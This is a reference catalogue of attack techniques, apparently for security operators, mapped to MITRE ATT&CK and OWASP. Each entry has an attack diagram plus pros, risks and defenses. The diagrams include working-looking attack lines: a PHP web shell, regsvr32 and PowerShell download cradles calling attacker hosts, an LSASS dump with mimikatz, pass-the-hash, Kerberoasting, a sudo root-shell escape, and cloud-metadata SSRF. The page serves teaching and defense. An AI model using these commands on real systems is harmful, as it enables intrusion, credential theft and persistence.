Hacking#

Reference catalog of attack techniques an operator should recognize. The page is structured in two halves: a brief catalog that maps the major taxonomies (MITRE ATT&CK, OWASP Top 10) so an unknown technique can be located, and a longer technique deep dives section where each technique gets a description, an attacker / victim diagram, and the operator’s risk / reward trade-off.

The MITRE ATT&CK Enterprise matrix has ~200 techniques and ~600+ sub-techniques across 14 tactics; OWASP Top 10 covers the highest- impact web application weaknesses. This page is the index, not the encyclopedia; follow the references at the end for the full matrices.

Use only against systems you own or have written authorization to test. The same techniques are evidence in real intrusions.

ATT&CK Tactics#

The 14 tactical phases of an enterprise intrusion. Each is a why; techniques under it are the how.

Tactic

Adversary goal

Reconnaissance (TA0043)

Gather information before touching the target.

Resource Development (TA0042)

Build or buy infrastructure: domains, malware, certs.

Initial Access (TA0001)

Get the first foothold.

Execution (TA0002)

Run adversary code on a system.

Persistence (TA0003)

Survive reboots, password changes, cleanup.

Privilege Escalation (TA0004)

Gain higher-level permissions.

Defense Evasion (TA0005)

Avoid detection; bypass controls.

Credential Access (TA0006)

Steal account names, passwords, tokens, keys.

Discovery (TA0007)

Learn about the environment from inside.

Lateral Movement (TA0008)

Pivot to other systems.

Collection (TA0009)

Gather data of interest.

Command and Control (TA0011)

Communicate with compromised systems.

Exfiltration (TA0010)

Steal the data out.

Impact (TA0040)

Manipulate, interrupt, or destroy.

OWASP Top 10 (2021)#

Risk

Description

A01 Broken Access Control

Authz bypass, IDOR, missing function-level checks.

A02 Cryptographic Failures

Weak / outdated crypto, missing TLS, hardcoded keys.

A03 Injection

SQL / NoSQL / OS / LDAP / template injection.

A04 Insecure Design

Threat-model gaps, missing rate limits, business logic.

A05 Security Misconfiguration

Default creds, verbose errors, open buckets, bad CORS.

A06 Vulnerable Components

Outdated libraries, known-CVE deps, supply chain.

A07 Auth and Identification

Weak passwords, missing MFA, broken sessions.

A08 Software and Data Integrity

Unsigned updates, deserialisation, untrusted CI/CD.

A09 Security Logging

Missing audit logs, unmonitored systems.

A10 Server-Side Request Forgery

Server fetches attacker-controlled URL.

Index of techniques covered below#

The catalog lists every technique by name; the deep dives below cover the highest-impact ones. The detailed list, by tactic.

  • Recon, Active Scanning, Search Open Tech DBs, Phishing for Info

  • Initial Access, Phishing, Exploit Public-Facing, Valid Accounts, Supply Chain

  • Execution, PowerShell, Exploitation for Execution, User Execution

  • Persistence, Boot/Logon Autostart, Scheduled Tasks, Account Manipulation, Web Shell

  • Privilege Escalation, Sudo abuse, Token Manipulation, Kernel exploit

  • Defense Evasion, Process Injection, LOLBins, Obfuscated files, Disable EDR

  • Credential Access, LSASS dump, Password Spraying, Kerberoasting, Cred stores

  • Discovery, Account / Service / Share enumeration

  • Lateral Movement, Pass the Hash, RDP / SSH, Pass the Ticket

  • C2, HTTPS C2, DNS tunnel, Domain Fronting

  • Exfiltration, C2 channel, alt protocol, cloud storage

  • Impact, Ransomware, Wipe, Defacement

  • Web, SQLi, XSS, SSRF, IDOR, SSTI, XXE, Deserialisation, JWT

  • Network, ARP spoof, NTLM relay, Zerologon, EternalBlue

  • Wireless, Evil Twin, WPA2 PSK crack, KRACK, GPS spoof

  • Cloud, IMDS SSRF, Public bucket, Token theft, Container escape

  • Social, Phishing, Vishing, MFA Fatigue, BEC, SIM Swap

Technique deep dives#

Each technique below follows the same template: a one-line description, a small attacker / victim diagram, and the operator’s trade-off (pros / risks / detection). Use the diagrams to talk a colleague through the attack on a whiteboard; use the trade-offs to pick which technique fits the engagement.

Initial Access#

Phishing (T1566)#

Description. Adversary delivers a malicious link, attachment, or service-impersonation message to one or many recipients. Sub-techniques: spearphishing link / attachment / via service.

attacker                       infra (mail / SaaS)              victim
  │                                  │                            │
  │  craft email                     │                            │
  ├──────────►  send via SPF-aligned │                            │
  │            domain or compromised │  inbox delivery            │
  │            relay                 ├───────────────────────────►│
  │                                  │                            │
  │                                  │  user clicks link /        │
  │                                  │  opens attachment          │
  │  ◄────────────  payload / cred ──┤                            │
  │                callback           ◄───────────────────────────┤
  │                                                               │
  ▼                                                               ▼
foothold + creds                                          credential leak
                                                          or code execution
  • Pros (attacker), works against humans, not patches; cheap per-target; bypasses most network controls.

  • Risks, noisy at scale; domain reputation costs; AV / mail sandbox detonation; user reporting.

  • Defenses, DMARC / DKIM / SPF, mail sandboxing, user training, FIDO2 / hardware keys to neutralize credential phish, link-rewriting gateways.

Exploit Public-Facing Application (T1190)#

Description. Adversary exploits a software bug in an internet-facing service (web app, VPN, mail server, file transfer appliance) to gain code execution.

attacker                                          victim (public service)
  │  HTTP / TLS                                          │
  ├─────────────────────────────────────────────────────►│
  │  payload exploits CVE-XXXX-YYYY                      │
  │                                                      │
  │  ◄────────────────────────  RCE / shell ────────────┤
  │                                                      ▼
  │                                            attacker code on box
  │                                            (often as web user)
  • Pros, direct, no human in the loop; one good CVE = many targets.

  • Risks, patched fast; signature-detected; exploits burn quickly.

  • Defenses, patch SLAs, WAF, network IDS, attack-surface monitoring, EDR on appliances.

Valid Accounts (T1078)#

Description. Use legitimate credentials, default, leaked, purchased, or stolen, to log in through normal channels (VPN, SSH, OAuth, RDP).

leak / phish / stuff                attacker                        victim
───────────────────                                                    │
                                       │  username + password         │
creds purchased on        ────────────►├──────────────────────────────►│
underground market                     │                              │
                                       │  ◄──── session  ──────────── │
                                       ▼                              ▼
                                normal-looking login          looks legitimate
  • Pros, looks like real activity; bypasses many detections; no code on disk.

  • Risks, MFA blocks most password-only attempts; impossible- travel and behavioral analytics catch reuse.

  • Defenses, MFA (FIDO2 strongest), conditional access, password-reuse detection, dark-web monitoring for leaked creds.

Execution#

PowerShell (T1059.001)#

Description. Run adversary code via the Windows PowerShell interpreter, inline, base64-encoded, or downloaded at runtime.

attacker payload (.ps1)
             │
             ▼
     powershell.exe -enc <base64>
             │
             ├── invokes .NET assemblies
             ├── pulls remote payloads (IEX (New-Object Net.WebClient))
             └── reflects DLL into memory

victim host                                   attacker C2
  │                                                │
  │  WMI / scheduled task / shortcut runs PS       │
  │  ──────────►  PowerShell loads + runs          │
  │                ──────────► outbound HTTPS ────►│
  │                                                ▼
  • Pros, on every Windows host; fileless variants leave little disk evidence.

  • Risks, AMSI, Constrained Language Mode, ScriptBlock / Module logging, EDR script telemetry.

  • Defenses, enforce Constrained Language Mode, enable ScriptBlock logging, app control on PS, alert on encoded command lines.

Persistence#

Scheduled Task / Job (T1053)#

Description. Register a recurring task (cron, at, schtasks, launchd) that runs the adversary payload regardless of who is logged in.

attacker (with code-exec)        victim host
     │
     │  schtasks /create /tn evil /tr C:\bad.exe
     │  /sc HOURLY /ru SYSTEM
     ├────────────────────────────►   /etc/cron.d/.evil
     │                                /var/spool/cron/...
     │                                HKLM\..\Schedule\TaskCache
     │                                                │
     │                                                ▼
     │                                  ⏰ task fires every hour
     │                                                │
     │  ◄────────  callback / payload  ◄──────────────┘
  • Pros, survives reboots without modifying binaries; schedulable; SYSTEM-level execution easy.

  • Risks, task DBs are well-instrumented; named tasks stand out; defenders diff against baselines.

  • Defenses, audit Microsoft-Windows-TaskScheduler events, baseline cron entries, sysmon rule on schtasks.

Web Shell (T1505.003)#

Description. Drop an attacker-controlled script (PHP, ASP, JSP, .NET) into the web root so HTTP requests with a magic parameter execute commands.

    internet                  victim web server
                                    │
                                    ├─ /var/www/html/.shell.php
                                    │     <?php system($_GET['c']); ?>
                                    │
attacker  ──── GET /.shell.php?c=id ─►│
                                    │
         ◄────────  uid=33(www-data) ─┤
  • Pros, C2 disguised as normal web traffic; survives most reboots; works through restrictive egress.

  • Risks, filename / hash known to defenders; web-server logs show requests with strange parameters.

  • Defenses, file-integrity monitoring on the web root, WAF signatures, anomalous parameter / URI alerting, YARA rules.

Privilege Escalation#

Sudo / Setuid Abuse (T1548.003)#

Description. Misconfigured sudo rules or world-writable setuid binaries let a low-priv user run commands as root.

low-priv user                          host
     │
     │  sudo -l   ► "may run /usr/bin/find as root"
     │
     ├─────────────►  sudo find /etc -exec /bin/sh \;
     │                                       │
     │  ◄──── root shell  ◄──────────────────┘
     ▼
uid=0(root)
  • Pros, no exploit code; uses legitimate binaries; bypasses most EDRs that focus on malware.

  • Risks, sudo log entries are obvious; a curated allowlist closes the gap.

  • Defenses, audit /etc/sudoers; require NOPASSWD on specific commands only; sudoreplay of root sessions; remove unnecessary setuid bits.

Defense Evasion#

Process Injection (T1055)#

Description. Allocate memory in another running process and execute attacker code from inside it, inheriting that process’s identity, network rules, and parent / EDR profile.

attacker process                       victim process (e.g. explorer.exe)
     │
     │  OpenProcess(PID, ALL_ACCESS)
     │  VirtualAllocEx(remote, RWX)
     │  WriteProcessMemory(payload)
     │  CreateRemoteThread(start)
     ├──────────────────────────────►   ┌──────────────┐
     │                                  │   shellcode  │
     │                                  │   running as │
     │                                  │   explorer   │
     │                                  └──────────────┘
  • Pros, payload lives in a trusted process; EDR sees explorer.exe making the C2 callout, not malware.exe.

  • Risks, modern EDR hooks the injection APIs; AMSI / ETW see the payload.

  • Defenses, enable ETW / Sysmon process / thread-create events, block remote-thread / WriteProcessMemory from non-LSASS processes, hardware-rooted attestation.

Living-Off-the-Land Binaries (LOLBins, T1218)#

Description. Use signed, trusted, OS-shipped binaries (rundll32, mshta, regsvr32, msiexec, certutil) to download / execute payloads.

attacker C2                                  victim host
     │   payload.sct on web server                │
     │                                            │
     │                  regsvr32 /s /n /u /i:http://attacker/payload.sct scrobj.dll
     │                  ◄──────────────────────── │
     │                                            │
     │  payload.sct ───► loaded by signed binary  ▼
     │                                       attacker code
                                             running as user
                                             under signed-binary parent
  • Pros, application allowlists let signed binaries through; forensics reads “Microsoft Corp” as parent.

  • Risks, known LOLBins are well-cataloged (lolbas-project.github.io); EDR baselines unusual command lines.

  • Defenses, WDAC / AppLocker rules that block specific LOLBin invocation patterns; EDR rules on rundll32 with unusual parents / args.

Credential Access#

LSASS Memory Dump (T1003.001)#

Description. Read or dump the memory of lsass.exe to extract NTLM hashes, Kerberos tickets, and clear-text passwords.

attacker (admin / SeDebug)                  lsass.exe
     │  procdump.exe -ma lsass.exe out.dmp        │
     │  comsvcs.dll MiniDump                      │
     │  mimikatz sekurlsa::logonpasswords         │
     ├───────────────────────────────────────────►│
     │                                            │
     │  ◄──── memory image / parsed creds ────────│
     ▼
pile of NTLM hashes, Kerberos TGTs, plaintext passwords (if WDigest enabled)
  • Pros, one shot, many credentials, often domain admin.

  • Risks, LSASS access is heavily monitored; ProtectedProcess and Credential Guard block most reads.

  • Defenses, enable LSASS Protected Process Light, Credential Guard, ATP / Defender for Identity, alert on OpenProcess to LSASS from non-system parents.

Password Spraying (T1110.003)#

Description. Try one common password (Spring2026!) against many accounts. Avoids account lockout that hits “many passwords against one account” brute force.

attacker                                       org SSO / VPN
    │                                                │
    │  alice@org   :  Spring2026!  ────────────────►│  fail
    │  bob@org     :  Spring2026!  ────────────────►│  fail
    │  carol@org   :  Spring2026!  ────────────────►│  ✓ success
    │  ...                                            │
    │  one pwd × N users, with lockout-safe pacing    │
  • Pros, works against any unprotected SSO; finds the weakest user, not the weakest password.

  • Risks, spike in failed logins is a signature; many IdPs throttle.

  • Defenses, MFA, conditional access, lockout / pacing detection, geo-velocity alerting.

Kerberoasting (T1558.003)#

Description. Request Kerberos service tickets (TGS) for service accounts, take the encrypted blob offline, crack the service account’s password.

attacker (any domain user)            DC (KDC)
     │  TGS-REQ for SPN MSSQLSvc/db1.contoso.local         │
     ├────────────────────────────────────────────────────►│
     │  ◄── TGS ticket encrypted with service-account NTLM │
     │
     ▼  hashcat -m 13100 tickets.txt rockyou.txt
     cracked clear-text password
             │
             ▼
     login as the service account (often privileged)
  • Pros, only requires one valid domain user to start; offline cracking is invisible to network monitoring.

  • Risks, AES-256 service-ticket encryption resists cracking; honeypot SPNs alert defenders.

  • Defenses, msDS-ManagedPasswordInterval (gMSA), strong service-account passwords, alert on TGS-REQ for many SPNs from one user.

Lateral Movement#

Pass the Hash (T1075 / T1550.002)#

Description. Authenticate to SMB / WinRM using a stolen NTLM hash directly, without ever knowing the cleartext password.

attacker (with NTLM hash from Host A)
     │
     │  pth-winexe -U user%aad3b...    ────────────►   Host B
     │  impacket-psexec hashes:lm:nt   ────────────►   Host B
     │                                                  │
     │  ◄────────  shell as user  ◄────────────────────┘
     │
     ▼  repeat for Host C, D, ... until DA
  • Pros, MFA on workstations doesn’t apply to SMB / WinRM; no password to try / fail.

  • Risks, restricted admin / Credential Guard / LAPS make hash reuse harder; KB5005413 disables NTLM in many estates.

  • Defenses, LAPS for unique local admin passwords, disable NTLM where possible, tier-0 admin segmentation, alert on Type-9 logons to many hosts in a window.

Command and Control#

HTTPS C2 (T1071.001)#

Description. Adversary tunnels command-and-control over HTTPS to a domain that looks legitimate; payload is encrypted inside TLS.

victim (compromised host)              attacker C2
    │                                       │
    │  TLS to cdn-cache.example.com         │
    ├──────────────────────────────────────►│
    │  ◄── tasking (commands)  ─────────────│
    │  ── results / files ─────────────────►│
    │                                       │
    │  jitter + sleep makes traffic look   │
    │  like normal browser polling         │
  • Pros, blends with normal browsing traffic; TLS hides payload from IDS; egress almost always allowed.

  • Risks, domain reputation, TLS fingerprint (JA3 / JA4), beacon-pattern detection by NDR.

  • Defenses, TLS inspection where possible, JA3 baselining, domain-reputation feeds, beacon-cadence detection (sliding variance on inter-request times).

DNS Tunnelling (T1071.004)#

Description. Encode C2 traffic in DNS query names / TXT records. Slow but bypasses many egress filters that allow DNS.

victim                                        attacker auth NS
    │  resolve   abc123.cmd.attacker.example  │
    ├────────────────────────────────────────►│
    │  ◄── TXT  "ZWNobyBoZWxsbw=="  (cmd) ────│
    │
    │  exec, encode result, query again       │
    ├────────────────────────────────────────►│
    │  ...                                    │
  • Pros, works through corporate firewalls that allow DNS; no proxy interception.

  • Risks, entropy on subdomain labels stands out; query rate to one zone is anomalous.

  • Defenses, log all DNS at the resolver, alert on high- entropy / high-rate queries to a single zone, sinkhole known-bad zones.

Web app techniques#

SQL Injection#

Description. Attacker input concatenated into a SQL query modifies the query’s intent, returning data, mutating tables, or executing OS commands via xp_cmdshell.

attacker                                       app
    │  GET /search?q=' OR 1=1--                   │
    ├────────────────────────────────────────────►│  builds query:
    │                                              │   SELECT * FROM users
    │                                              │   WHERE name = '' OR 1=1--'
    │                                              │
    │  ◄────────────── full table dump ───────────│
  • Pros, directly reads / writes the database; often authentication bypass; Union / blind / time-based variants cover almost any case.

  • Risks, WAFs catch the obvious cases; parameterized queries shut it down entirely.

  • Defenses, prepared statements / ORM, least-privilege DB user, WAF in negative + positive mode, query-pattern logging.

Cross-Site Scripting (XSS)#

Description. Attacker-controlled JavaScript runs in a victim’s browser inside the target site’s origin, access to cookies, DOM, fetch credentials.

attacker                site                   victim browser
    │  POST /comment       │                          │
    │  body=<script>...    │  store in DB             │
    ├─────────────────────►│                          │
    │                      │                          │
    │                      │  GET /thread             │
    │                      │◄─────────────────────────│
    │                      │  ── HTML w/ <script> ───►│
    │                                                 │  runs in
    │  ◄──── document.cookie / fetch + send ─────────│  victim origin
    ▼
cookies / session tokens leaked
  • Pros, session hijack, credential theft, defacement, all in one bug; scales across every visitor.

  • Risks, modern frameworks auto-escape; CSP and HttpOnly + SameSite cookies blunt impact.

  • Defenses, output encoding, CSP, HttpOnly cookies, Trusted Types, WAF for the obvious payloads.

Server-Side Request Forgery (SSRF)#

Description. App fetches a URL from user input. Attacker points it at internal services or cloud metadata.

attacker                            target app             internal / cloud
    │  POST /fetch                       │                        │
    │  url=http://169.254.169.254/...    │                        │
    ├───────────────────────────────────►│                        │
    │                                    │  GET (from app's NIC) │
    │                                    ├───────────────────────►│
    │                                    │  ◄── IAM creds ────── │
    │  ◄── proxied response (creds) ─────│                        │
    ▼
AWS / GCP / Azure session tokens
  • Pros, pivots from web app into the cloud control plane; often full-account takeover.

  • Risks, IMDSv2 (token-based) blocks the easy AWS path; network egress filters break it.

  • Defenses, IMDSv2-only, deny-list private ranges in fetchers, fetch via a dedicated proxy that resolves and rejects internal IPs.

Insecure Direct Object Reference (IDOR)#

Description. App uses a predictable identifier (sequential id, account number) without authorization check, letting one user read or modify another’s data.

attacker (logged in as user 42)               app
    │  GET /api/orders/9001       (mine)         │  authz check ok
    ├───────────────────────────────────────────►│
    │  GET /api/orders/9002       (someone else)│  no check
    ├───────────────────────────────────────────►│
    │  ◄── someone else's order ─────────────────│
    ▼
  • Pros, trivial to find by incrementing IDs; no exploit code; full data exposure.

  • Risks, proper authz middleware closes it; pen-test scanners catch it routinely.

  • Defenses, authorize on every object access, opaque IDs (UUIDs are not authz, but help against enumeration), automated authz-fuzzing in CI.

Network and host#

NTLM Relay (T1187 / T1557.001)#

Description. Trick a host into authenticating to the attacker (LLMNR poisoning, PetitPotam), then relay the auth to a second target the victim has rights to.

victim host                     attacker             target service
    │  query name                   │ responder.py       │
    ├──────────────────────────────►│                    │
    │  ◄── pretend I have it ───────│                    │
    │  send NTLM auth ──────────────│                    │
    │                               │ relay NTLM auth ──►│
    │                               │  ◄── access ──────│
    │                               ▼
    │                       attacker now reads / writes
    │                       what victim could
  • Pros, no cracking; bridges two scopes (workstation -> LDAP / SMB / HTTP); often domain-admin path.

  • Risks, SMB signing / LDAP signing / Channel Binding break the relay; KB5005413 mitigations.

  • Defenses, enforce SMB / LDAP signing, EPA on HTTPS, disable LLMNR / NetBIOS, modern auth (Kerberos with FAST).

Zerologon (CVE-2020-1472)#

Description. Netlogon used AES-CFB8 with an all-zero IV; an attacker can blank the DC’s machine password, then reset it.

attacker (any LAN host)                 unpatched DC
    │  send 256 NetrServerAuthenticate3       │
    │  with zero ClientCredential             │
    ├────────────────────────────────────────►│
    │  ◄── one in 256 succeeds ───────────────│
    │  set DC machine password to empty       │
    ├────────────────────────────────────────►│
    │  ◄────────── DA via dcsync ─────────────│
  • Pros, unauthenticated RCE-equivalent on the DC; from network-only adjacency to domain admin in ~3 seconds.

  • Risks, patched since 2020; signature-detected; resets the DC machine password and breaks AD until restored.

  • Defenses, patch (and the August 2020 + February 2021 enforcement updates), monitor Microsoft-Windows-Netlogon events 5827 / 5828 / 5829.

Wireless#

Evil Twin#

Description. Stand up a rogue access point with the target’s SSID. Devices that have auto-connect to that SSID join the attacker’s AP.

victim laptop                       attacker AP                 internet
    │  beacon for "CorpWifi"            │
    │  ◄────────────────────────────────│  beacon "CorpWifi"
    │  associate, DHCP, gateway = AP    │
    ├──────────────────────────────────►│  ── pass through ───►
    │                                   │  log creds, MITM TLS
    │                                   │  inject payloads
  • Pros, works without breaking encryption; clients trust saved SSIDs; MITM full traffic.

  • Risks, 802.1X / EAP-TLS prevents association; Wi-Fi intrusion detection finds duplicate BSSIDs.

  • Defenses, WPA3 + 802.1X with cert validation, “delete saved network” policies, WIDS that flags duplicate SSIDs.

Cloud#

IMDS SSRF (cloud metadata theft)#

Description. Attacker uses an SSRF in a cloud-hosted app to reach the instance metadata service and steal IAM credentials.

attacker                  vulnerable web app on EC2
    │  fetch?url=                  │
    │  http://169.254.169.254/     │
    │  latest/meta-data/iam/        │
    │  security-credentials/RoleX   │
    ├──────────────────────────────►│
    │                               │  IMDSv1 returns JSON
    │  ◄── temp AccessKey/Secret ───│
    ▼
aws sts get-caller-identity → assume RoleX from anywhere
  • Pros, one SSRF -> full role permissions; works from the attacker’s laptop with the stolen creds.

  • Risks, IMDSv2 mandatory mode blocks the trivial path; egress allowlists cap the damage.

  • Defenses, enforce IMDSv2 (AWS), use Workload Identity Federation, scope IAM roles tightly, alert on STS calls from unexpected source IPs.

Container Escape (T1611)#

Description. Break out of a container into the host kernel or container manager, gaining the host’s privileges.

    container (privileged or vulnerable runc)
                    │
                    │  /proc/1/attr,  hostPath mount,
                    │  CAP_SYS_ADMIN, CVE in runc
                    ▼
               host kernel
                    │
                    ▼
               every other container on the host
  • Pros, one bug = the whole node; lateral movement to all workloads on the same host.

  • Risks, modern runtimes (gVisor, Kata, Firecracker) make escapes much harder; OS-level seccomp / AppArmor blocks most paths.

  • Defenses, gVisor / Kata for hostile workloads, --security-opt + seccomp / AppArmor, drop capabilities, read-only root filesystem, no privileged containers.

Social engineering#

MFA Fatigue (T1621)#

Description. Attacker has the password; spam push-MFA prompts to the victim until they tap “approve” out of habit or to make the buzz stop.

attacker (with cred)                IdP                          victim phone
     │  login as alice                │                              │
     ├───────────────────────────────►│  push MFA prompt #1          │
     │                                ├─────────────────────────────►│ ✗
     │  retry                         │  push MFA prompt #2          │
     ├───────────────────────────────►├─────────────────────────────►│ ✗
     │  retry × N                     │  ...                          │
     │                                │  push MFA prompt #50         │
     │                                ├─────────────────────────────►│ ✓
     │  ◄────────── session ──────────│ user taps approve             │
  • Pros, defeats classic push MFA; cheap; near-zero technical sophistication.

  • Risks, number-matching MFA blocks it; users can be trained.

  • Defenses, number-matching / verified push MFA, FIDO2 / WebAuthn (no push at all), rate-limit prompts per user, alert on N-prompts-per-window.

Business Email Compromise (BEC)#

Description. Attacker takes over or impersonates an executive’s email and instructs finance / accounting to wire money or reroute payment instructions to attacker-controlled accounts.

attacker  (compromised CEO inbox or look-alike domain)
    │
    │  "Process this wire urgently before EOD."
    │  attached fake invoice, real-looking signature
    ├──────────────────────────────────────►   finance@victim.com
    │                                                 │
    │                                                 │ wire transfer
    │                                                 ▼
    │  ◄────────── $$$ to mule account ───────────────
  • Pros, huge financial reward; little technical footprint; often slides past anti-phishing because the email isn’t malicious in content.

  • Risks, callback / out-of-band verification breaks it; SPF / DKIM / DMARC on look-alike domains.

  • Defenses, mandatory phone callback for wires above $X, SPF / DKIM / DMARC strict mode, payment-change controls, vendor-portal-only updates.

Impact#

Ransomware (T1486)#

Description. Encrypt the victim’s data with a key the attacker holds and demand payment for the decryption key. Modern variants double-extort: encrypt + threaten to publish the stolen copy.

attacker (with code-exec on many hosts)
     │  enumerate, exfiltrate sensitive data first
     ├──────────────────────────────────────────►   leak site / staging
     │
     │  on every host:
     │    delete shadow copies, backups, snapshots
     │    encrypt with AES + RSA-wrapped key
     │    leave note with TOR contact
     ▼
victim files unreadable; backups gone if not air-gapped
  • Pros (attacker), direct cash-out via crypto; double extortion increases conversion; many orgs pay.

  • Risks, LE tracking of crypto flows; reputational + legal cost; some jurisdictions ban paying.

  • Defenses, offline / immutable backups, MFA + EDR + email hygiene to block the upstream chain, network segmentation, rapid-response IR retainer.

References#